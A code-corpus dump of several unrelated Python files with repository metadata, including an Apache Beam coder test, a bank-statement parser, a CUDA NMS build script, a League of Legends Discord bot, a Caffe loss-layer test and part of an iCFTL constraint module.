ma.field1 = u'hello world'
mb = test_message.MessageA()
mb.field1 = u'beam'
proto_coder = coders.ProtoCoder(ma.__class__)
self.check_coder(proto_coder, ma)
self.check_coder(coders.TupleCoder((proto_coder, coders.BytesCoder())),
(ma, b'a'), (mb, b'b'))
def test_global_window_coder(self):
coder = coders.GlobalWindowCoder()
value = window.GlobalWindow()
# Verify cloud object representation
self.assertEqual({'@type': 'kind:global_window'},
coder.as_cloud_object())
# Test binary representation
self.assertEqual(b'', coder.encode(value))
self.assertEqual(value, coder.decode(b''))
# Test unnested
self.check_coder(coder, value)
# Test nested
self.check_coder(coders.TupleCoder((coder, coder)),
(value, value))
def test_length_prefix_coder(self):
coder = coders.LengthPrefixCoder(coders.BytesCoder())
# Verify cloud object representation
self.assertEqual(
{
'@type': 'kind:length_prefix',
'component_encodings': [coders.BytesCoder().as_cloud_object()]
},
coder.as_cloud_object())
# Test binary representation
self.assertEqual(b'\x00', coder.encode(b''))
self.assertEqual(b'\x01a', coder.encode(b'a'))
self.assertEqual(b'\x02bc', coder.encode(b'bc'))
self.assertEqual(b'\xff\x7f' + b'z' * 16383, coder.encode(b'z' * 16383))
# Test unnested
self.check_coder(coder, b'', b'a', b'bc', b'def')
# Test nested
self.check_coder(coders.TupleCoder((coder, coder)),
(b'', b'a'),
(b'bc', b'def'))
def test_nested_observables(self):
class FakeObservableIterator(observable.ObservableMixin):
def __iter__(self):
return iter([1, 2, 3])
# Coder for elements from the observable iterator.
elem_coder = coders.VarIntCoder()
iter_coder = coders.TupleSequenceCoder(elem_coder)
# Test nested WindowedValue observable.
coder = coders.WindowedValueCoder(iter_coder)
observ = FakeObservableIterator()
value = windowed_value.WindowedValue(observ, 0, ())
self.assertEqual(
coder.get_impl().get_estimated_size_and_observables(value)[1],
[(observ, elem_coder.get_impl())])
# Test nested tuple observable.
coder = coders.TupleCoder((coders.StrUtf8Coder(), iter_coder))
value = (u'123', observ)
self.assertEqual(
coder.get_impl().get_estimated_size_and_observables(value)[1],
[(observ, elem_coder.get_impl())])
def test_state_backed_iterable_coder(self):
# pylint: disable=global-variable-undefined
# required for pickling by reference
global state
state = {}
def iterable_state_write(values, element_coder_impl):
token = b'state_token_%d' % len(state)
state[token] = [element_coder_impl.encode(e) for e in values]
return token
def iterable_state_read(token, element_coder_impl):
return [element_coder_impl.decode(s) for s in state[token]]
coder = coders.StateBackedIterableCoder(
coders.VarIntCoder(),
read_state=iterable_state_read,
write_state=iterable_state_write,
write_state_threshold=1)
context = pipeline_context.PipelineContext(
iterable_state_read=iterable_state_read,
iterable_state_write=iterable_state_write)
self.check_coder(
coder, [1, 2, 3], context=context, test_size_estimation=False)
# Ensure that state was actually used.
self.assertNotEqual(state, {})
self.check_coder(coders.TupleCoder((coder, coder)),
([1], [2, 3]),
context=context,
test_size_estimation=False)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
| 37.815574
| 80
| 0.647231
|
0d0034660c9ff9a2a0fbc2ade1e8e796b7ed5175
| 2,592
|
py
|
Python
|
cinderella/parsers/post.py
|
benkajaja/Cinderella
|
64bf42e69583192ffa716a0e67c54c945aa5f6de
|
[
"Apache-2.0"
] | null | null | null |
cinderella/parsers/post.py
|
benkajaja/Cinderella
|
64bf42e69583192ffa716a0e67c54c945aa5f6de
|
[
"Apache-2.0"
] | null | null | null |
cinderella/parsers/post.py
|
benkajaja/Cinderella
|
64bf42e69583192ffa716a0e67c54c945aa5f6de
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
from datetime import datetime
from decimal import Decimal
from cinderella.datatypes import Transactions, StatementCategory
from cinderella.parsers.base import StatementParser
class TaiwanPost(StatementParser):
identifier = "post"
def __init__(self):
super().__init__()
self.default_source_accounts = {StatementCategory.bank: "Assets:Bank:Post"}
def _read_statement(self, filepath: str) -> pd.DataFrame:
df = pd.read_csv(
filepath, skipfooter=2, skiprows=1, thousands=",", engine="python"
)
df = df.replace({"=": "", '"': ""}, regex=True)
return df
def _parse_bank_statement(self, records: pd.DataFrame) -> Transactions:
category = StatementCategory.bank
transactions = Transactions(category, self.identifier)
prev_transaction = None
for _, record in records.iterrows():
date_tw = str(record[0])
date_to_ce = date_tw.replace(date_tw[0:3], str(int(date_tw[0:3]) + 1911))
date = datetime.strptime(date_to_ce, "%Y/%m/%d %H:%M:%S")
title = record[1]
if not pd.isna(record[3]):
price = -Decimal(record[3])
elif not pd.isna(record[4]):
price = Decimal(record[4])
else:
raise RuntimeError(
f"Can not parse {self.identifier} {category.name} statement {record}"
)
currency = "TWD"
account = self.default_source_accounts[category]
if (
prev_transaction and date == prev_transaction.date and price == 0
): # duplicated record
transaction = prev_transaction
self.beancount_api.add_transaction_comment(
transaction, f"{title}-{price}"
)
else:
transaction = self.beancount_api.make_transaction(
date, title, account, price, currency
)
transactions.append(transaction)
if str(record[6]).strip():
self.beancount_api.add_transaction_comment(transaction, str(record[6]))
if record[7]:
self.beancount_api.add_transaction_comment(transaction, str(record[7]))
prev_transaction = transaction
return transactions
def _parse_card_statement(self, records: list) -> Transactions:
raise NotImplementedError
def _parse_stock_statement(self, records: list) -> Transactions:
raise NotImplementedError
| 36.507042
| 89
| 0.596451
|
23eb25b1d1dcca9122e3d933482f6078cc50832a
| 5,276
|
py
|
Python
|
lib/nms/setup_linux.py
|
ZucchiniTang/Deformable-ConvNets
|
e91c3aee8284abefbe87007d41fa0c801e179bd5
|
[
"MIT"
] | null | null | null |
lib/nms/setup_linux.py
|
ZucchiniTang/Deformable-ConvNets
|
e91c3aee8284abefbe87007d41fa0c801e179bd5
|
[
"MIT"
] | null | null | null |
lib/nms/setup_linux.py
|
ZucchiniTang/Deformable-ConvNets
|
e91c3aee8284abefbe87007d41fa0c801e179bd5
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------
# Deformable Convolutional Networks
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Modified from py-faster-rcnn (https://github.com/rbgirshick/py-faster-rcnn)
# --------------------------------------------------------
import os
from os.path import join as pjoin
from setuptools import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import numpy as np
def find_in_path(name, path):
"Find a file in a search path"
# Adapted fom
# http://code.activestate.com/recipes/52224-find-a-file-given-a-search-path/
for dir in path.split(os.pathsep):
binpath = pjoin(dir, name)
if os.path.exists(binpath):
return os.path.abspath(binpath)
return None
def locate_cuda():
"""Locate the CUDA environment on the system
Returns a dict with keys 'home', 'nvcc', 'include', and 'lib64'
and values giving the absolute path to each directory.
Starts by looking for the CUDAHOME env variable. If not found, everything
is based on finding 'nvcc' in the PATH.
"""
# first check if the CUDAHOME env variable is in use
if 'CUDAHOME' in os.environ:
print("cudahome")
home = os.environ['CUDAHOME']
nvcc = pjoin(home, 'bin', 'nvcc')
else:
# otherwise, search the PATH for NVCC
default_path = pjoin(os.sep, 'usr', 'local', 'cuda', 'bin')
nvcc = find_in_path('nvcc', os.environ['PATH'] + os.pathsep + default_path)
if nvcc is None:
raise EnvironmentError('The nvcc binary could not be '
'located in your $PATH. Either add it to your path, or set $CUDAHOME')
home = os.path.dirname(os.path.dirname(nvcc))
print(home, nvcc)
cudaconfig = {'home':home, 'nvcc':nvcc,
'include': pjoin(home, 'include'),
'lib64': pjoin(home, 'lib64')}
for k, v in cudaconfig.iteritems():
if not os.path.exists(v):
raise EnvironmentError('The CUDA %s path could not be located in %s' % (k, v))
return cudaconfig
CUDA = locate_cuda()
# Obtain the numpy include directory. This logic works across numpy versions.
try:
numpy_include = np.get_include()
except AttributeError:
numpy_include = np.get_numpy_include()
def customize_compiler_for_nvcc(self):
"""inject deep into distutils to customize how the dispatch
to gcc/nvcc works.
If you subclass UnixCCompiler, it's not trivial to get your subclass
injected in, and still have the right customizations (i.e.
distutils.sysconfig.customize_compiler) run on it. So instead of going
the OO route, I have this. Note, it's kindof like a wierd functional
subclassing going on."""
# tell the compiler it can processes .cu
self.src_extensions.append('.cu')
# save references to the default compiler_so and _comple methods
default_compiler_so = self.compiler_so
super = self._compile
# now redefine the _compile method. This gets executed for each
# object but distutils doesn't have the ability to change compilers
# based on source extension: we add it.
def _compile(obj, src, ext, cc_args, extra_postargs, pp_opts):
if os.path.splitext(src)[1] == '.cu':
# use the cuda for .cu files
self.set_executable('compiler_so', CUDA['nvcc'])
# use only a subset of the extra_postargs, which are 1-1 translated
# from the extra_compile_args in the Extension class
postargs = extra_postargs['nvcc']
else:
postargs = extra_postargs['gcc']
super(obj, src, ext, cc_args, postargs, pp_opts)
# reset the default compiler_so, which we might have changed for cuda
self.compiler_so = default_compiler_so
# inject our redefined _compile method into the class
self._compile = _compile
# run the customize_compiler
class custom_build_ext(build_ext):
def build_extensions(self):
customize_compiler_for_nvcc(self.compiler)
build_ext.build_extensions(self)
ext_modules = [
Extension(
"cpu_nms",
["cpu_nms.pyx"],
extra_compile_args={'gcc': ["-Wno-cpp", "-Wno-unused-function"]},
include_dirs = [numpy_include]
),
Extension('gpu_nms',
['nms_kernel.cu', 'gpu_nms.pyx'],
library_dirs=[CUDA['lib64']],
libraries=['cudart'],
language='c++',
runtime_library_dirs=[CUDA['lib64']],
# this syntax is specific to this build system
# we're only going to use certain compiler args with nvcc and not with
# gcc the implementation of this trick is in customize_compiler() below
extra_compile_args={'gcc': ["-Wno-unused-function"],
'nvcc': ['-arch=sm_35',
'--ptxas-options=-v',
'-c',
'--compiler-options',
"'-fPIC'"]},
include_dirs = [numpy_include, CUDA['include']]
),
]
setup(
name='nms',
ext_modules=ext_modules,
# inject our custom trigger
cmdclass={'build_ext': custom_build_ext},
)
| 36.895105
| 90
| 0.625284
|
a2c9fa875fc1b309f173e2162ae7985e5f2f42c7
| 2,939
|
py
|
Python
|
bot.py
|
blbudima/tilt-bot
|
9b0e15724216bc03c7ddc2b2313382c8f733fd47
|
[
"MIT"
] | null | null | null |
bot.py
|
blbudima/tilt-bot
|
9b0e15724216bc03c7ddc2b2313382c8f733fd47
|
[
"MIT"
] | null | null | null |
bot.py
|
blbudima/tilt-bot
|
9b0e15724216bc03c7ddc2b2313382c8f733fd47
|
[
"MIT"
] | null | null | null |
# DON'T FORGET TO ENABLE THE VIRTUAL ENVIRONMENT VIA:
# .\bot-env\Scripts\activate.bat
# DON'T FORGET TO RESET RIOT API TOKEN
# https://developer.riotgames.com/
# SET THE TOKEN AS AN ENVIRONMENT VARIABLE NAMED "RIOT_API_KEY"
# ON WINDOWS, RUN BOT THROUGH POWERSHELL VIA: py -3 bot.py
import discord
import config
import cassiopeia
from cassiopeia import Summoner, Patch
# set riot api key
cassiopeia.set_riot_api_key(config.riot_api_key)
# create new Discord client
client = discord.Client()
# on ready, say ready
@client.event
async def on_ready():
print('Ready as {0.user}'.format(client))
@client.event
async def on_message(message):
# ignore message from itself
if message.author == client.user:
return
# extract content
args = message.content.split()
# check for search command
if args[0] == config.prefix + 'search':
# if there is no username, return
if (len(args) == 1):
return await message.channel.send('Incorrect usage! You need to supply a username as well!')
# prepare name
spaces = ' '
args.pop(0)
username = spaces.join(args)
# just for console
print('The extracted username is: ' + username)
# send notice
await message.channel.send('Let me check...')
# create summoner object
print('Attempting to create summoner object (Region NA)..')
summoner_name = Summoner(name=username, region="NA")
# attempt to look up match history
print('Attempting to look up match history...')
try:
match_hist = summoner_name.match_history(begin_time=Patch.from_str("10.7", region="NA").start)
except Exception as e:
print(e)
return await message.channel.send('That username does not exist!')
# check if you are looking for a win streak or a loss streak
looking_for_win = False
if (match_hist[0].participants[summoner_name].team.win is True):
looking_for_win = True
# count match streak
match_counter = 1
while (True):
next_turnout = match_hist[match_counter].participants[summoner_name].team.win
if (looking_for_win and not next_turnout) or (not looking_for_win and next_turnout):
break
match_counter += 1
# print results
print('Printing out result for ' + username)
if looking_for_win:
return await message.channel.send(username + ' is on a ' + str(match_counter) + ' game winning streak.')
else:
return await message.channel.send(username + ' is on a ' + str(match_counter) + ' game losing streak.')
# if user supplied help command, show search
if args[0] == config.prefix + 'help':
return await message.channel.send('The proper command is `' + config.prefix + 'search <username>`.')
# if user supplied invalid command, show search
if args[0][0:2] == config.prefix:
return await message.channel.send('Invalid usage! Do `' + config.prefix + 'search <username>`.')
# login with the client
client.run(config.token)
| 31.602151
| 110
| 0.695475
|
d1f0c2a30f76dccb8376ef866e6e2746a6fd0fb0
| 2,558
|
py
|
Python
|
caffe/python/caffe/test/test_adaptive_weighting_loss_layer.py
|
gvvynplaine/training_toolbox_caffe
|
789ff8ddf6031802e51e45f6ad80c549079dc9df
|
[
"Apache-2.0"
] | 3
|
2021-07-21T10:39:48.000Z
|
2021-09-21T20:49:07.000Z
|
caffe/python/caffe/test/test_adaptive_weighting_loss_layer.py
|
gvvynplaine/training_toolbox_caffe
|
789ff8ddf6031802e51e45f6ad80c549079dc9df
|
[
"Apache-2.0"
] | null | null | null |
caffe/python/caffe/test/test_adaptive_weighting_loss_layer.py
|
gvvynplaine/training_toolbox_caffe
|
789ff8ddf6031802e51e45f6ad80c549079dc9df
|
[
"Apache-2.0"
] | 2
|
2020-12-07T03:16:05.000Z
|
2021-03-23T00:57:15.000Z
|
# pylint: skip-file
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tempfile
import unittest
import caffe
import numpy as np
def python_net_file():
with tempfile.NamedTemporaryFile(mode='w+', delete=False) as f:
f.write("""name: 'adaptive_weighting_loss_layer_test_net'
force_backward: true
layer { name: "input1" type: "Input" top: "input1"
input_param { shape { dim: 1 } } }
layer { name: "input2" type: "Input" top: "input2"
input_param { shape { dim: 1 } } }
layer { name: "input3" type: "Input" top: "input3"
input_param { shape { dim: 1 } } }
layer { type: 'Python' name: 'adaptive_loss'
bottom: 'input1' bottom: 'input2' bottom: 'input3'
top: 'adaptive_loss_value'
python_param { module: 'caffe.custom_layers.adaptive_weighting_loss_layer'
layer: 'AdaptiveWeightingLossLayer'
param_str: '{ "scale": 1.0, "init": 0.0}' } }""")
return f.name
@unittest.skipIf('Python' not in caffe.layer_type_list(), 'Caffe built without Python layer support')
class TestScheduleScaleLayer(unittest.TestCase):
def setUp(self):
net_file = python_net_file()
self.net = caffe.Net(net_file, caffe.TRAIN)
os.remove(net_file)
def test_forward(self):
data = np.random.uniform(0.5, 15.0, size=3)
target_value = np.sum(data)
self.net.blobs['input1'].data[...] = data[0]
self.net.blobs['input2'].data[...] = data[1]
self.net.blobs['input3'].data[...] = data[2]
net_outputs = self.net.forward()
predicted_value = net_outputs['adaptive_loss_value']
self.assertEqual(len(predicted_value), 1)
self.assertAlmostEqual(predicted_value[0], target_value, places=5)
| 39.96875
| 101
| 0.605942
|
11c298662f8c621d5ab79b85c56500d0bebafd62
| 546
|
py
|
Python
|
setup.py
|
knavsaria/dynodoc
|
f0594990b447022ab8ba8c0d305f7ea982708860
|
[
"MIT"
] | null | null | null |
setup.py
|
knavsaria/dynodoc
|
f0594990b447022ab8ba8c0d305f7ea982708860
|
[
"MIT"
] | null | null | null |
setup.py
|
knavsaria/dynodoc
|
f0594990b447022ab8ba8c0d305f7ea982708860
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
setup (
name="dynodoc",
version="0.1",
description='DynamoDB CLI tool that uses the document interface',
url='http://github.com/knavsaria/dynodoc',
download_url='https://github.com/knavsaria/dynodoc/archive/0.1.tar.gz',
author='Keeran Navsaria',
author_email='keeran.navsaria@gmail.com',
packages=find_packages(),
install_requires=[
"Click",
"boto3"
],
entry_points='''
[console_scripts]
dynodoc=dynodoc.dynodoc:cli
'''
)
| 27.3
| 75
| 0.653846
|
8ed566be899f197058bf112a94e07e9853974bbf
| 40,989
|
py
|
Python
|
VyPR/Specifications/constraints.py
|
SNTSVV/VyPR-iCFTL
|
8e6b170821fb4dc1278094d2ed270e5fd619c193
|
[
"Apache-2.0"
] | null | null | null |
VyPR/Specifications/constraints.py
|
SNTSVV/VyPR-iCFTL
|
8e6b170821fb4dc1278094d2ed270e5fd619c193
|
[
"Apache-2.0"
] | null | null | null |
VyPR/Specifications/constraints.py
|
SNTSVV/VyPR-iCFTL
|
8e6b170821fb4dc1278094d2ed270e5fd619c193
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright (C) 2021 University of Luxembourg
Developed by Dr. Joshua Heneage Dawes.
Module containing classes to represent constraints used in an iCFTL specification.
For example, in the specification
forall q in changes(x) : q(x) < 10
q(x) < 10 is a constraint and is represented using the classes in this module.
"""
from VyPR.Specifications.predicates import changes, calls
import VyPR.Logging.logger as logger
def _is_constraint_base(obj):
"""
Decide whether obj has ConstraintBase as a base class.
"""
return ConstraintBase in type(obj).__bases__
def _is_connective(obj):
"""
Decide whether obj is a logical connective (and, or, not).
"""
return type(obj) in [Conjunction, Disjunction, Negation]
def is_complete(obj):
"""
Decide whether obj is complete, or needs to be completed by further method calls.
"""
return _is_connective(obj) or _is_constraint_base(obj)
def is_normal_atom(obj):
"""
Decide whether an atomic constraint is normal (it requires only one measurement).
"""
return NormalAtom in type(obj).__bases__
def is_mixed_atom(obj):
"""
Decide whether an atomic constraint is mixed (it requires multiple measurements).
"""
return MixedAtom in type(obj).__bases__
def derive_sequence_of_temporal_operators(obj) -> dict:
"""
Traverse the structure of the given atomic constraint in order to determine the sequence
of temporal operators used.
"""
# initialise map from subatom index to sequence of temporal operators
# check whether the atomic constraint given is normal or mixed
if is_normal_atom(obj):
# normal atomic constraint case
return {
0: _derive_sequence_of_temporal_operators(obj)
}
else:
# mixed atomic constraint case
return {
0: _derive_sequence_of_temporal_operators(obj.get_lhs_expression()),
1: _derive_sequence_of_temporal_operators(obj.get_rhs_expression())
}
def _derive_sequence_of_temporal_operators(obj) -> list:
"""
Traverse the structure of the given atomic constraint. This function is called by
derive_sequence_of_temporal_operators in order to generate either 1 or 2 sequences
of temporal operators (1 for normal case, 2 for mixed case).
"""
# initialise empty sequence of temporal operators
temporal_operator_sequence = []
# initialise the current object to be used during the traversal
current_obj = obj
# traverse the structure of current_obj until we reach a variable
while type(current_obj) not in [ConcreteStateVariable, TransitionVariable]:
# check the type of current_obj
# we only add to the temporal operator sequence in certain cases,
# for example when a Next... class is found
if type(current_obj) in [ValueInConcreteStateEqualsConstant,
ValueInConcreteStateLessThanConstant,
ValueInConcreteStateGreaterThanConstant,
ValueLengthInConcreteStateEqualsConstant,
ValueLengthInConcreteStateGreaterThanConstant,
ValueLengthInConcreteStateLessThanConstant,
ValueLengthInConcreteStateEqualsTransitionDuration,
ValueLengthInConcreteStateGreaterThanTransitionDuration,
ValueLengthInConcreteStateLessThanTransitionDuration]:
current_obj = current_obj.get_value_expression()
elif type(current_obj) in [DurationOfTransitionLessThanConstant,
DurationOfTransitionGreaterThanConstant]:
current_obj = current_obj.get_transition_duration_obj()
elif type(current_obj) is ValueInConcreteState:
current_obj = current_obj.get_concrete_state_expression()
elif type(current_obj) is ValueLengthInConcreteState:
current_obj = current_obj.get_value_expression()
elif type(current_obj) is DurationOfTransition:
current_obj = current_obj.get_transition_expression()
elif type(current_obj) in [ConcreteStateBeforeTransition, ConcreteStateAfterTransition]:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_transition_expression()
elif type(current_obj) is NextTransitionFromConcreteState:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_concrete_state_expression()
elif type(current_obj) is NextConcreteStateFromConcreteState:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_concrete_state_expression()
elif type(current_obj) is NextTransitionFromTransition:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_transition_expression()
elif type(current_obj) is NextConcreteStateFromTransition:
temporal_operator_sequence.append(current_obj)
current_obj = current_obj.get_transition_expression()
# add the variable to the end of the sequence
temporal_operator_sequence.append(current_obj)
return temporal_operator_sequence
def get_base_variable(obj) -> list:
"""
Get the temporal operator sequence of obj and return the last element (the base variable)
Note: we assume that the object given does not have multiple base variables, hence
in the case of a mixed atom, the object given should be a part of the atomic constraint (and not the atomic constraint
itself).
"""
return _derive_sequence_of_temporal_operators(obj)[-1]
class Constraint():
"""
Class for representing the recursive structure of the quantifier-free part of iCFTL specifications.
"""
def __init__(self, specification_obj, constraint):
self._specification_obj = specification_obj
self._constraint = constraint
def __repr__(self):
executed_lambda = self.instantiate()
if ConstraintBase not in type(executed_lambda).__bases__:
# TODO: indicate which part of the constraint is not complete
logger.log.info("Constraint given in specification is not complete:")
logger.log.info(str(executed_lambda))
raise Exception("Constraint given in specification is not complete.")
return str(executed_lambda)
def instantiate(self):
"""
Determine the set of variables from quantifiers and instantiate the quantifier-free
part of the specification.
"""
arguments = self._specification_obj.get_variable_to_obj_map()
executed_lambda = self._constraint(**arguments)
return executed_lambda
def get_atomic_constraints(self):
"""
Traverse the specification in order to get a list of the atomic constraints used.
"""
# initialise an empty list of all atomic constraints
all_atomic_constraints = []
# initialise stack wth top-level Specification object for traversal
stack = [self]
# process the stack while it is not empty
while len(stack) > 0:
# get the top element from the stack
top = stack.pop()
# based on the type, add child elements to the stack
if type(top) is Constraint:
stack.append(top.instantiate())
elif type(top) is Conjunction:
stack += top.get_conjuncts()
elif type(top) is Disjunction:
stack += top.get_disjuncts()
elif type(top) is Negation:
stack.append(top.get_operand())
elif _is_constraint_base(top):
all_atomic_constraints.append(top)
return all_atomic_constraints
class ConstraintBase():
"""
Class for representing the root of a combination of constraints.
"""
pass
class NormalAtom():
"""
Class representing an atomic constraint for which a single measurement must be taken.
"""
pass
class MixedAtom():
"""
Class representing an atomic constraint for which multiple measurements must be taken.
"""
pass
"""
Propositional connectives.
"""
class Conjunction(ConstraintBase):
"""
Class to represent a conjunction of 2 or more constraints.
"""
def __init__(self, *conjuncts):
# check that each conjunct is complete
for conjunct in conjuncts:
if not is_complete(conjunct):
raise Exception(f"Conjunct {conjunct} is not complete")
# we cast to a list so that conjuncts can be replaced during formula tree updates
self._conjuncts = list(conjuncts)
def __repr__(self):
serialised_conjuncts = map(str, self._conjuncts)
return " and ".join(serialised_conjuncts)
def get_conjuncts(self) -> list:
return self._conjuncts
class Disjunction(ConstraintBase):
"""
Class to represent a disjunction of 2 or more constraints.
"""
def __init__(self, *disjuncts):
# check that each disjunct is complete
for disjunct in disjuncts:
if not is_complete(disjunct):
raise Exception(f"Disjunct {disjunct} is not complete")
# we cast to a list so that conjuncts can be replaced during formula tree updates
self._disjuncts = list(disjuncts)
def __repr__(self):
serialised_disjuncts = map(str, self._disjuncts)
return " or ".join(serialised_disjuncts)
def get_disjuncts(self) -> list:
return self._disjuncts
class Negation(ConstraintBase):
"""
Class to represent the negation.
Negation should be propagated through to atomic constraints.
"""
def __init__(self, operand):
# check that operand is complete
if not is_complete(operand):
raise Exception(f"Operand {operand} for negation is not complete")
self.operand = operand
def __repr__(self):
return f"not( {self.operand} )"
def get_operand(self):
return self.operand
"""
Types of expressions.
"""
class ConcreteStateExpression():
"""
Class to represent a concrete state (whether bound to a variable or seen elsewhere).
"""
def next(self, predicate):
"""
Given a predicate, instantiate an object representing either the next satisfying concrete
state or the next satisfying transition.
"""
if type(predicate) is calls:
return NextTransitionFromConcreteState(self, predicate)
elif type(predicate) is changes:
return NextConcreteStateFromConcreteState(self, predicate)
def __call__(self, program_variable_name: str):
return ValueInConcreteState(self, program_variable_name)
class TransitionExpression():
"""
Class to represent a transition (whether bound to a variable or seen elsewhere).
"""
def duration(self):
return DurationOfTransition(self)
def next(self, predicate):
"""
Given a predicate, instantiate an object representing either the next satisfying concrete
state or the next satisfying transition.
"""
if type(predicate) is calls:
return NextTransitionFromTransition(self, predicate)
elif type(predicate) is changes:
return NextConcreteStateFromTransition(self, predicate)
def before(self):
"""
Instantiate a ConcreteStateBeforeTransition object.
"""
return ConcreteStateBeforeTransition(self)
def after(self):
"""
Instantiate a ConcreteStateBeforeTransition object.
"""
return ConcreteStateAfterTransition(self)
"""
Types of variables.
"""
class ConcreteStateVariable(ConcreteStateExpression):
"""
Class to represent a concrete state captured by a quantifier.
"""
def __init__(self, name):
self._name = name
def __repr__(self):
return self._name
def __eq__(self, other):
return (type(other) is type(self)
and self._name == other._name)
def get_name(self) -> str:
return self._name
class TransitionVariable(TransitionExpression):
"""
Class to represent a transition captured by a quantifier.
"""
def __init__(self, name):
self._name = name
def __repr__(self):
return self._name
def __eq__(self, other):
return (type(other) is type(self)
and self._name == other._name)
def get_name(self) -> str:
return self._name
"""
Attributes of concrete states.
"""
class ValueInConcreteState():
"""
Class to represent the value given to a variable by a concrete state.
"""
def __init__(self, concrete_state_expression, program_variable_name):
self._concrete_state_expression = concrete_state_expression
self._program_variable_name = program_variable_name
def __repr__(self):
return f"{self._concrete_state_expression}({self._program_variable_name})"
def __eq__(self, other):
return (type(other) is type(self)
and self._concrete_state_expression == other._concrete_state_expression
and self._program_variable_name == other._program_variable_name)
def get_concrete_state_expression(self):
return self._concrete_state_expression
def get_program_variable(self):
return self._program_variable_name
def length(self):
return ValueLengthInConcreteState(self)
def __lt__(self, other):
if type(other) in [int, str, float]:
return ValueInConcreteStateLessThanConstant(self, other)
def __gt__(self, other):
if type(other) in [int, str, float]:
return ValueInConcreteStateGreaterThanConstant(self, other)
def equals(self, other):
if type(other) in [int, str, float, bool]:
return ValueInConcreteStateEqualsConstant(self, other)
class ValueLengthInConcreteState(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x).length() == n for a concrete state variable q, a program variable
x and a (numerical) constant n.
"""
def __init__(self, value_expression):
self._value_expression = value_expression
def __repr__(self):
return f"{self._value_expression}.length()"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression)
def get_value_expression(self):
return self._value_expression
def __lt__(self, other):
if type(other) in [int, float]:
return ValueLengthInConcreteStateLessThanConstant(self, other)
elif type(other) is DurationOfTransition:
return ValueLengthInConcreteStateLessThanTransitionDuration(self, other)
def __gt__(self, other):
if type(other) in [int, float]:
return ValueLengthInConcreteStateGreaterThanConstant(self, other)
elif type(other) is DurationOfTransition:
return ValueLengthInConcreteStateGreaterThanTransitionDuration(self, other)
def equals(self, other):
if type(other) in [int, float]:
return ValueLengthInConcreteStateEqualsConstant(self, other)
elif type(other) is DurationOfTransition:
return ValueLengthInConcreteStateEqualsTransitionDuration(self, other)
"""
Atomic constraints for concrete states.
"""
class ValueLengthInConcreteStateLessThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x).length() < n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression} < {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement < self._constant
class ValueLengthInConcreteStateGreaterThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x).length() > n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression} > {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement > self._constant
class ValueLengthInConcreteStateEqualsConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x).length().equals(n) for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression}.equals({self._constant})"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement == self._constant
class ValueLengthInConcreteStateLessThanTransitionDuration(ConstraintBase, MixedAtom):
"""
Class to represent the atomic constraint q(x).length() < t.duration() for a concrete state variable q, a program variable x
and a transition duration t.duration().
"""
def __init__(self, value_expression, duration):
self._value_expression = value_expression
self._duration = duration
def __repr__(self):
return f"{self._value_expression} < {self._duration}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._duration == other._duration)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
# construct a list of the lhs and rhs of the time between operator
expressions = [self._value_expression, self._duration]
return expressions[index]
def get_lhs_expression(self):
return self.get_expression(0)
def get_rhs_expression(self):
return self.get_expression(1)
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
# first, check to see if both timestamps for the two subatoms have now been recorded
if measurement_dictionary[atom_index].get(0) and measurement_dictionary[atom_index].get(1):
# the measurements exist, so compare them
